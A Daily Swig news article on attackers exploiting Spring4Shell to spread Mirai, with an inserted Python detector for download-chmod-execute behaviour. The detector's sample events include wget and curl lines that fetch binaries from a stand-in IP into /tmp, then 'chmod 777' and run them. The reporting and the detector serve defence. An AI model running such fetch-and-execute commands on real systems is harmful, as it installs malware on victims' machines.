Attackers are abusing Spring4Shell vulnerability to spread Mirai botnet malware – The Daily Swig

Spring is sprung
Attackers are abusing the #Spring4Shell vulnerability to distribute the Mirai botnet malware
Miscreants have started abusing the recently discovered Spring4Shell vulnerability as a vector for the spread of the Mirai botnet.
Trend Micro researchers have noticed the active exploitation of Spring4Shell – a critical vulnerability in the Java-based Core module of VMware’s Spring Framework – to hack into unpatched devices before infecting them with the Mirai malware.
Exploitation began at the start of April in attacks focused on systems in Singapore, according to Trend Micro.
Abusing the Spring4Shell vulnerability (CVE-2022-22965) allows “threat actors to download the Mirai sample to the /tmp folder and execute them after permission change using chmod”, a blog post by Trend Micro explains.
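The download, chmod and execute sequence Trend Micro describes can be hunted for in process telemetry. The sketch below is an added example, not code from Trend Micro or The Daily Swig; the event format, host names, addresses and the assumption that the vulnerable application runs as a `java` process are constructed for illustration.

```python
import re
import shlex
from collections import defaultdict

# Constructed, time-ordered process events (hypothetical format):
# (time, host, parent process name, command line)
SAMPLE_EVENTS = [
    ("10:00:01", "web01", "java", "wget -O /tmp/sample.bin http://198.51.100.7/sample.bin"),
    ("10:00:02", "web01", "java", "chmod 777 /tmp/sample.bin"),
    ("10:00:03", "web01", "java", "/tmp/sample.bin"),
    ("10:05:00", "web02", "bash", "chmod 644 /tmp/report.txt"),
    ("10:06:00", "web03", "java", "curl -o /tmp/x http://198.51.100.7/x"),
    ("10:06:05", "web03", "cron", "chmod +x /opt/backup.sh"),
]

DOWNLOADERS = {"wget", "curl"}
SERVER_PARENTS = {"java"}  # assumption: Tomcat/Spring runs as a java process

def makes_executable(argv):
    """True for chmod calls whose mode sets an execute bit (octal or symbolic)."""
    if len(argv) < 3 or argv[0].rsplit("/", 1)[-1] != "chmod":
        return False
    mode = argv[1]
    if mode.isdigit():
        return any(int(d) & 1 for d in mode[-3:])
    return re.search(r"[+=][rwXst]*x", mode) is not None

def detect(events):
    """Alert when a /tmp file is downloaded, made executable and then run,
    all by children of the application server on the same host."""
    stages = defaultdict(set)  # (host, path) -> stages already seen
    alerts = []
    for ts, host, parent, cmdline in events:
        if parent not in SERVER_PARENTS:
            continue
        argv = shlex.split(cmdline)
        tool = argv[0].rsplit("/", 1)[-1]
        if tool in DOWNLOADERS:
            for path in (a for a in argv[1:] if a.startswith("/tmp/")):
                stages[(host, path)].add("download")
        elif makes_executable(argv):
            for path in (a for a in argv[2:] if a.startswith("/tmp/")):
                stages[(host, path)].add("chmod")
        elif argv[0].startswith("/tmp/"):
            if {"download", "chmod"} <= stages[(host, argv[0])]:
                alerts.append((ts, host, argv[0]))
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print("ALERT download->chmod->exec from app server:", alert)
```
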
The vulnerability can be used to trigger remote code execution in Spring Core applications under non-default circumstances. The security bug should not be confused with CVE-2022-22963 – a separate security vulnerability affecting the Spring Cloud Function.
Spring4Shell affects Spring Framework versions before 5.2.20 and 5.3.18 on Java Development Kit (JDK) version 9 or higher. Apache Tomcat is also affected – it is the web server environment in which Trend Micro detected attacks against its clients’ systems.
As previously reported, CVE-2022-22965 has also been seen in limited, in-the-wild exploitation, spurring warnings by both the US Cybersecurity and Infrastructure Security Agency and Microsoft’s Threat Intelligence Team. Microsoft said that the threat had cropped up in attacks against its cloud-based services.
Mirai is a strain of malware that turns networking devices running Linux into drones in a botnet. The malware first surfaced in August 2016 and primarily affected hardware devices such as IP cameras and home routers.
It rose to prominence because of its subsequent abuse in several high-profile attacks, including a hugely disruptive attack against DNS provider Dyn in October 2016.
The Daily Swig asked Trend Micro a series of questions about the exploitation of Spring4Shell to spread Mirai. No word back as yet, but we’ll update this story as and when we hear more.

John Leyden
@jleyden